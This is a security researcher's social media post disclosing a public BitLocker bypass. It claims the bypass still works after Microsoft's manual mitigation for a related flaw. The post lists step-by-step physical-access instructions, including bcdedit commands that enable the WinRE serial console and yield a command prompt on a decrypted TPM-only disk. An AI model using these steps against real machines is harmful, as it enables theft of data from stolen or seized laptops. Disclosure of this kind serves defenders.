Post B72A82kFbMRd1Om2ee by wdormann@infosec.exchange
 (DIR) More posts by wdormann@infosec.exchange
 (DIR) Post #B72A82kFbMRd1Om2ee by wdormann@infosec.exchange
       2026-06-05T20:19:26Z
       
       2 likes, 1 repeats
       
       Well, bitskrieg is public.While Microsoft "fixed" YellowKey as CVE-2026-45585 (and by "fixed", I mean they have provided manual steps that you can perform if you want to remove autofstx.exe from the WinRE registry BootExecute value), bitskrieg still works on such a system to achieve the same goal.  Though it requires a second computer, or a device that can communicate on a serial port.Boot into WinReGo to a command prompt, ignoring the prompt to enter a bitlocker recovery key.  (Click Skip this drive)Enable the serial port in WinRe:bcdedit /set ems 1bcdedit /set emsport 1Reboot back into WinReFrom your other computer, connect to the serial port.Type:cmdesctab-Enjoy your cmd.exe prompt (over serial) with a decrypted (assuming it's TPM-only) hard disk.